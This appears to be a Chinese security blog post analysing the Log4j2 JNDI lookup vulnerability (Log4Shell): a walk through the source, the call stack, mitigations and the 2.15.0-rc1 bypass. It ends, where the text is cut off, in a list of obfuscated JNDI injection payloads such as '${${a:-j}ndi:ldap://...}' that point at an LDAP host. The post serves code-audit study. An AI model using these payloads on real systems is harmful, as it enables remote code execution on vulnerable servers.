<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="ki10Moc" />
  <meta name="description" content="" />
  
  
  <title>
    
      log4j2绕过手法 
      
      
      |
    
     ki10Moc&#39;s World
  </title>

  
    <link rel="apple-touch-icon" href="/images/1.png">
    <link rel="icon" href="/images/1.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-RG82N8DQZ9"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());

      gtag('config', 'G-RG82N8DQZ9');
    </script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 5.4.2"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/1.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">ki10Moc</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">ki10Moc</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">log4j2绕过手法</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2023-06-10 19:46:36
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags" title="Tags"></i>
                
                <span class="span--tag">
                  <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="代码审计">
                    <b>#</b> 代码审计
                  </a>
                </span>
                
                <span class="span--tag">
                  <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                    <b>#</b> Java安全
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <p>漏洞刚出那会就复现过，漏洞原理也了解了</p>
<p>比赛上也打过类似的漏洞</p>
<p>但是没有系统的总结过该漏洞包括成因包括后续的Bypass等</p>
<p>遂有该篇文章</p>
<h1 id="0x01环境准备"><a href="#0x01环境准备" class="headerlink" title="0x01环境准备"></a>0x01环境准备</h1><p>Log4j2Test01.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.LogManager;</span><br><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.Logger;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.function.LongFunction;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Log4j2Test01</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">( String[] args )</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">Logger</span> <span class="variable">logger</span> <span class="operator">=</span> LogManager.getLogger(LongFunction.class);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>





<p>Log4j2_test.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.LogManager;</span><br><span class="line"><span class="keyword">import</span> org.apache.logging.log4j.Logger;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.function.LongFunction;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Log4j2_test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="type">Logger</span> <span class="variable">logger</span> <span class="operator">=</span> LogManager.getLogger(LongFunction.class);</span><br><span class="line"></span><br><span class="line">        <span class="type">String</span> <span class="variable">str</span> <span class="operator">=</span> <span class="string">&quot;$&#123;java:os&#125;&quot;</span>;</span><br><span class="line">        <span class="keyword">if</span> (str != <span class="literal">null</span>)&#123;</span><br><span class="line">            logger.info(<span class="string">&quot;result:&#123;&#125;&quot;</span>,str);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>log4j2.xml</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- log4j2 配置文件 --&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 日志级别 trace&lt;debug&lt;info&lt;warn&lt;error&lt;fatal --&gt;</span><span class="tag">&lt;<span class="name">configuration</span> <span class="attr">status</span>=<span class="string">&quot;info&quot;</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- 自定义属性 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">Properties</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!-- 日志格式(控制台) --&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Property</span> <span class="attr">name</span>=<span class="string">&quot;pattern1&quot;</span>&gt;</span>[%-5p] %d %c - %m%n<span class="tag">&lt;/<span class="name">Property</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!-- 日志格式(文件) --&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Property</span> <span class="attr">name</span>=<span class="string">&quot;pattern2&quot;</span>&gt;</span></span><br><span class="line">            =========================================%n 日志级别：%p%n 日志时间：%d%n 所属类名：%c%n 所属线程：%t%n 日志信息：%m%n</span><br><span class="line">        <span class="tag">&lt;/<span class="name">Property</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!-- 日志文件路径 --&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">Property</span> <span class="attr">name</span>=<span class="string">&quot;filePath&quot;</span>&gt;</span>logs/myLog.log<span class="tag">&lt;/<span class="name">Property</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">Properties</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">appenders</span>&gt;</span> <span class="tag">&lt;<span class="name">Console</span> <span class="attr">name</span>=<span class="string">&quot;Console&quot;</span> <span class="attr">target</span>=<span class="string">&quot;SYSTEM_OUT&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">PatternLayout</span> <span class="attr">pattern</span>=<span class="string">&quot;$&#123;pattern1&#125;&quot;</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">Console</span>&gt;</span> <span class="tag">&lt;<span class="name">RollingFile</span> <span class="attr">name</span>=<span class="string">&quot;RollingFile&quot;</span> <span class="attr">fileName</span>=<span class="string">&quot;$&#123;filePath&#125;&quot;</span></span></span><br><span class="line"><span class="tag">                            <span class="attr">filePattern</span>=<span class="string">&quot;logs/$$&#123;date:yyyy-MM&#125;/app-%d&#123;MM-dd-yyyy&#125;-%i.log.gz&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">PatternLayout</span> <span class="attr">pattern</span>=<span class="string">&quot;$&#123;pattern2&#125;&quot;</span>/&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">SizeBasedTriggeringPolicy</span> <span class="attr">size</span>=<span class="string">&quot;5 MB&quot;</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">RollingFile</span>&gt;</span> <span class="tag">&lt;/<span class="name">appenders</span>&gt;</span> <span class="tag">&lt;<span class="name">loggers</span>&gt;</span> <span class="tag">&lt;<span class="name">root</span> <span class="attr">level</span>=<span class="string">&quot;info&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">appender-ref</span> <span class="attr">ref</span>=<span class="string">&quot;Console&quot;</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">appender-ref</span> <span class="attr">ref</span>=<span class="string">&quot;RollingFile&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span> <span class="tag">&lt;/<span class="name">loggers</span>&gt;</span><span class="tag">&lt;/<span class="name">configuration</span>&gt;</span></span><br></pre></td></tr></table></figure>





<p>pom配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependencies&gt;</span><br><span class="line">    &lt;dependency&gt;</span><br><span class="line">        &lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt;</span><br><span class="line">        &lt;artifactId&gt;log4j-core&lt;/artifactId&gt;</span><br><span class="line">        &lt;version&gt;2.14.1&lt;/version&gt;</span><br><span class="line">    &lt;/dependency&gt;</span><br><span class="line">    &lt;!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --&gt;</span><br><span class="line">    &lt;dependency&gt;</span><br><span class="line">        &lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt;</span><br><span class="line">        &lt;artifactId&gt;log4j-api&lt;/artifactId&gt;</span><br><span class="line">        &lt;version&gt;2.14.1&lt;/version&gt;</span><br><span class="line">    &lt;/dependency&gt;</span><br><span class="line">    &lt;dependency&gt;</span><br><span class="line">        &lt;groupId&gt;junit&lt;/groupId&gt;</span><br><span class="line">        &lt;artifactId&gt;junit&lt;/artifactId&gt;</span><br><span class="line">        &lt;version&gt;4.12&lt;/version&gt;</span><br><span class="line">        &lt;scope&gt;test&lt;/scope&gt;</span><br><span class="line">    &lt;/dependency&gt;</span><br><span class="line">&lt;/dependencies&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306061449040.png" alt="image-20230606144948921"></p>
<p>从图中可以看到打印内容并非java:os</p>
<p>而是java的系统信息，也就是说对我们传入的字符串内容进行处理并输出</p>
<p>如果是恶意的字符被传入，就可以非法利用</p>
<h1 id="0x02漏洞分析"><a href="#0x02漏洞分析" class="headerlink" title="0x02漏洞分析"></a>0x02漏洞分析</h1><p>影响版本</p>
<p>2.x &lt;&#x3D; log4j &lt;&#x3D; 2.15.0-rc1</p>
<p>按照上面的输出，我们在这里跟进一下代码</p>
<p>首先是进行遍历，内容进行拼接</p>
<p>buffer也就是我们要输出的java:os的内容</p>
<p>event则是输出我们打印的字符串</p>
<p><img src="C:\Users\ki10Moc\AppData\Roaming\Typora\typora-user-images\image-20230606234255714.png" alt="image-20230606234255714"></p>
<p>这里先有一个if判断，config不为空并且noLookups为true即可进入if</p>
<p>这里我钝了一下，为啥第二个条件为false也能进入if，才发现是!条件为true(老年人眼花</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306072044305.png" alt="image-20230607204435108"></p>
<p>进来之后还是一个遍历，是从66位开始的</p>
<p>那我们就去看下开始的位置</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306072035974.png" alt="image-20230607203511896"></p>
<p>可以看到66是r</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306072017430.png" alt="image-20230607201714340"></p>
<p>也就是</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306072051349.png" alt="image-20230607205146301"></p>
<p>接着来获取${</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">workingBuilder.charAt(i) == <span class="string">&#x27;$&#x27;</span> &amp;&amp; workingBuilder.charAt(i + <span class="number">1</span>) == <span class="string">&#x27;&#123;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>并且到这一步就可以看到最终的value的值为result:${java:os}</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306072145613.png" alt="image-20230607214556526"></p>
<p>跟进看一下替换过程</p>
<p>判断source(${java:os})不为空</p>
<p>来到重载的replace方法并调用substitute方法</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082134822.png" alt="image-20230608213421686"></p>
<p>接着走</p>
<p>来到substitute方法</p>
<p>前缀</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082137826.png" alt="image-20230608213700762"></p>
<p>和后缀</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082137232.png" alt="image-20230608213721180"></p>
<p>逃逸代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">final</span> <span class="type">char</span> <span class="variable">escape</span> <span class="operator">=</span> getEscapeChar();<span class="comment">//$</span></span><br></pre></td></tr></table></figure>

<p>这里会重复几轮，我们直接跳过</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082248346.png" alt="image-20230608224200558"></p>
<p>这个while进来就开始匹配${</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082302719.png" alt="image-20230608230255611"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pos &gt; offset <span class="comment">//false  跳出if</span></span><br></pre></td></tr></table></figure>



<p>接着pos和bufEnd进行比较(2&lt;11)</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082305928.png" alt="image-20230608230536543"></p>
<p>然后接着遍历</p>
<p>。。。</p>
<p>转的有点晕了</p>
<p>刚才只是小循环</p>
<p>大循环之后拿到varValue</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082319888.png" alt="image-20230608231920828"></p>
<p>再之后拿到char数组就是处理后的内容</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082321945.png" alt="image-20230608232121791"></p>
<p>一路跟进到revolveVariable方法</p>
<p>该方法根据不同协议选择相应的lookup逻辑进行解析</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306082332915.png" alt="image-20230608233233665"></p>
<p>ps：这里测试payload还是更换为jndi:ldap:&#x2F;&#x2F;127.0.0.1:1389&#x2F;Evil</p>
<p>再开两个服务ldap和http</p>
<p>测试一下没问题</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306091820133.png" alt="image-20230609182053737"></p>
<p>再跟进，更换paylaod主要是我们后续要跟到jndi部分，否则无法通过jndi调用lookup</p>
<p>调用jndi原生的lookup</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306091827190.png" alt="image-20230609182722941"></p>
<p>返回JndiManager的Class对象实体的字符串</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306091829888.png" alt="image-20230609182923776"></p>
<p>同上,最终来到jndiManager的lookup方法，继续跟进</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306091830818.png" alt="image-20230609183055722"></p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306091833385.png" alt="image-20230609183354177"></p>
<p>大致总结下就是                                                                                                                                                                                                       </p>
<ol>
<li>先判断内容中是否有<code>$&#123;&#125;</code>，然后截取<code>$&#123;&#125;</code>中的内容，得到我们的恶意payload<code>jndi:xxx</code></li>
<li>后使用<code>:</code>分割payload，通过前缀来判断使用何种解析器去<code>lookup</code></li>
<li>支持的前缀包括<code>date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j</code></li>
</ol>
<p>调用栈：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">lookup:<span class="number">172</span>, JndiManager (org.apache.logging.log4j.core.net)</span><br><span class="line">lookup:<span class="number">56</span>, JndiLookup (org.apache.logging.log4j.core.lookup)</span><br><span class="line">lookup:<span class="number">221</span>, Interpolator (org.apache.logging.log4j.core.lookup)</span><br><span class="line">resolveVariable:<span class="number">1110</span>, StrSubstitutor (org.apache.logging.log4j.core.lookup)</span><br><span class="line">substitute:<span class="number">1033</span>, StrSubstitutor (org.apache.logging.log4j.core.lookup)</span><br><span class="line">substitute:<span class="number">912</span>, StrSubstitutor (org.apache.logging.log4j.core.lookup)</span><br><span class="line">replace:<span class="number">467</span>, StrSubstitutor (org.apache.logging.log4j.core.lookup)</span><br><span class="line">format:<span class="number">132</span>, MessagePatternConverter (org.apache.logging.log4j.core.pattern)</span><br><span class="line">format:<span class="number">38</span>, PatternFormatter (org.apache.logging.log4j.core.pattern)</span><br><span class="line">toSerializable:<span class="number">344</span>, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout)</span><br><span class="line">toText:<span class="number">244</span>, PatternLayout (org.apache.logging.log4j.core.layout)</span><br><span class="line">encode:<span class="number">229</span>, PatternLayout (org.apache.logging.log4j.core.layout)</span><br><span class="line">encode:<span class="number">59</span>, PatternLayout (org.apache.logging.log4j.core.layout)</span><br><span class="line">directEncodeEvent:<span class="number">197</span>, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)</span><br><span class="line">tryAppend:<span class="number">190</span>, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)</span><br><span class="line">append:<span class="number">181</span>, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)</span><br><span class="line">tryCallAppender:<span class="number">156</span>, AppenderControl (org.apache.logging.log4j.core.config)</span><br><span class="line">callAppender0:<span class="number">129</span>, AppenderControl (org.apache.logging.log4j.core.config)</span><br><span class="line">callAppenderPreventRecursion:<span class="number">120</span>, AppenderControl (org.apache.logging.log4j.core.config)</span><br><span class="line">callAppender:<span class="number">84</span>, AppenderControl (org.apache.logging.log4j.core.config)</span><br><span class="line">callAppenders:<span class="number">540</span>, LoggerConfig (org.apache.logging.log4j.core.config)</span><br><span class="line">processLogEvent:<span class="number">498</span>, LoggerConfig (org.apache.logging.log4j.core.config)</span><br><span class="line">log:<span class="number">481</span>, LoggerConfig (org.apache.logging.log4j.core.config)</span><br><span class="line">log:<span class="number">456</span>, LoggerConfig (org.apache.logging.log4j.core.config)</span><br><span class="line">log:<span class="number">63</span>, DefaultReliabilityStrategy (org.apache.logging.log4j.core.config)</span><br><span class="line">log:<span class="number">161</span>, Logger (org.apache.logging.log4j.core)</span><br><span class="line">tryLogMessage:<span class="number">2205</span>, AbstractLogger (org.apache.logging.log4j.spi)</span><br><span class="line">logMessageTrackRecursion:<span class="number">2159</span>, AbstractLogger (org.apache.logging.log4j.spi)</span><br><span class="line">logMessageSafely:<span class="number">2142</span>, AbstractLogger (org.apache.logging.log4j.spi)</span><br><span class="line">logMessage:<span class="number">2017</span>, AbstractLogger (org.apache.logging.log4j.spi)</span><br><span class="line">logIfEnabled:<span class="number">1983</span>, AbstractLogger (org.apache.logging.log4j.spi)</span><br><span class="line">error:<span class="number">740</span>, AbstractLogger (org.apache.logging.log4j.spi)</span><br><span class="line">main:<span class="number">10</span>, Test (com.summer.test)</span><br></pre></td></tr></table></figure>





<h1 id="0x03-Log4j2的一些点"><a href="#0x03-Log4j2的一些点" class="headerlink" title="0x03 Log4j2的一些点"></a>0x03 Log4j2的一些点</h1><p>在 Log4j2 中提供的众多特性中，其中一个就是 Property Support。这个特性让使用者可以引用配置中的属性，或传递给底层组件并动态解析。这些属性来自于配置文件中定义的值、系统属性、环境变量、ThreadContext、和事件中存在的数据，用户也可以提供自定义的 Lookup 组件来配置自定义的值。</p>
<p>其中Lookup &amp; Substitution的过程也就是漏洞的关键点。提供Lookup功能的组件需要实现<code>org.apache.logging.log4j.core.lookup.StrLookup</code>接口，并通过配置文件进行设置。</p>
<p>Lookup支持的属性查找或替换选项(各协议)</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202305291507728.png" alt="image-20230529150704703"></p>
<h2 id="缓解措施及说明"><a href="#缓解措施及说明" class="headerlink" title="缓解措施及说明"></a>缓解措施及说明</h2><p>在 &gt;&#x3D; 2.10 版本，可以通过设置系统属性 <code>log4j2.formatMsgNoLookups</code> 或环境变量 <code>LOG4J_FORMAT_MSG_NO_LOOKUPS</code> 为 true 来缓解</p>
<p>log4j自从2.17.0后在<code>Lookup</code>中使用<code>Jndi</code>协议需要修改默认配置<code>log4j2.enableJndiLookup</code>,其默认为<code>false</code>，无法调用<code>jndi</code><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306051506347.png" alt="image-20230605150631273"></p>
<p>在 2.0-beta9 to 2.10.0 版本，可以通过移除 classpath 中的 <code>JndiLookup</code> 类来缓解</p>
<p><a target="_blank" rel="noopener" href="https://logging.apache.org/log4j/2.x/manual/lookups.html#JavaLookup">https://logging.apache.org/log4j/2.x/manual/lookups.html#JavaLookup</a></p>
<h2 id="消息格式化"><a href="#消息格式化" class="headerlink" title="消息格式化"></a>消息格式化</h2><p>log4j2通过<code>MessagePatternConverter</code>对日志消息进行处理，实例化该类时会从config中回去xml配置信息盘圆是否提供Lookups功能</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306092230302.png" alt="image-20230609223055193"></p>
<p>并且会从loadNoLookups函数进行加载来判断</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306092224216.png" alt="image-20230609222403190"></p>
<p>然后就是字符串解析替换</p>
<p>通过上面跟源码</p>
<p>字符串替换操作是通过StrSubstitutor#replace</p>
<p>然后是解析，通过设置变量，前缀${和后缀}</p>
<p>默认分隔符:-</p>
<p>分隔符:-</p>
<p>该类提供的substitute方法，也是整个Lookuop功能的核心，递归替换相应字符串</p>
<p>当然debug的时候确实很绕，不打断点一会就迷路了</p>
<p>这里直接看现成的例子(来自su18师傅)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">- :- 是一个赋值关键字，如果程序处理到 $&#123;aaaa:-bbbb&#125; 这样的字符串，处理的结果将会是 bbbb，:- 关键字将会被截取掉，而之前的字符串都会被舍弃掉。</span><br><span class="line">- :\- 是转义的 :-，如果一个用 a:b 表示的键值对的 key a 中包含 :，则需要使用转义来配合处理，例如 $&#123;aaa:\\-bbb:-ccc&#125;，代表 key 是，aaa:bbb，value 是 ccc。</span><br></pre></td></tr></table></figure>

<p>在没有匹配到变量赋值或处理结束后，将会调用 <code>resolveVariable</code> 方法解析满足 Lookup 功能的语法，并执行相应的 lookup ，将返回的结果替换回原字符串后，再次调用 <code>substitute</code> 方法进行递归解析。</p>
<p>后续的一些Bypass也是根据这些特征来进行的</p>
<p>由于 Log4j2 支持递归和嵌套解析，所以可以用来获取相关信息来实现一些攻击思路</p>
<h2 id="2-15-0-rc1-绕过"><a href="#2-15-0-rc1-绕过" class="headerlink" title="2.15.0(rc1)绕过"></a>2.15.0(rc1)绕过</h2><p>MessagePatternConverter类中，移除了从 Properties 中获取 Lookup 配置的选项，并修改判断逻辑，默认不开启 lookup 功能。</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306101443676.png" alt="image-20230610144333575"></p>
<p>其内部类方法对扩展功能进行模块化处理，在只有开启lookup功能的时候才能使用<code>LookupMessagePatternConverter</code> 来进行 Lookup 和替换。</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306101726724.png" alt="image-20230610172636544"></p>
<p>在默认情况下，将使用 <code>SimpleMessagePatternConverter</code> 进行消息的格式化处理，不会解析其中的 <code>$&#123;&#125;</code> 关键字。</p>
<p>接着实在JndiManager#lookup方法添加了校验，不会直接使用InitialContext创建JndiManager 实例</p>
<p>而是通过JndiManagerFactory ，使用子类InitialDirContext并为其添加白名单 JNDI 协议、白名单主机名、白名单类名。</p>
<p>最终在lookup方法中，逻辑在catch后没有return，导致可以利用URISyntaxException异常来绕过校验，直接走到后面lookup</p>
<p><img src="https://raw.githubusercontent.com/ki10Moc/img/main/img/202306101936972.png" alt="image-20230610193648895"></p>
<p>即url中存在空格即可出发漏洞</p>
<p>windows不行，Mac可以…</p>
<p>但是2.15.0版本默认是关闭lookup的，需要打开配置才能触发，有点鸡肋</p>
<p>虽然除了 JNDI 之外的核心包里的 Lookup 不能直接用来执行恶意代码，但是可以获取系统信息、环境变量、属性配置、JVM参数等等信息，这些信息可以被攻击者用来进行下一步的攻击。(Google CTF一个题目的非预期)</p>
<h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">$&#123;$&#123;a:-j&#125;ndi:ldap:<span class="comment">//127.0.0.1:1234/ExportObject&#125;;</span></span><br><span class="line">  </span><br><span class="line">$&#123;$&#123;a:-j&#125;n$&#123;::-d&#125;i:ldap:<span class="comment">//127.0.0.1:1234/ExportObject&#125;&quot;;</span></span><br><span class="line">  </span><br><span class="line">$&#123;$&#123;lower:jn&#125;di:ldap:<span 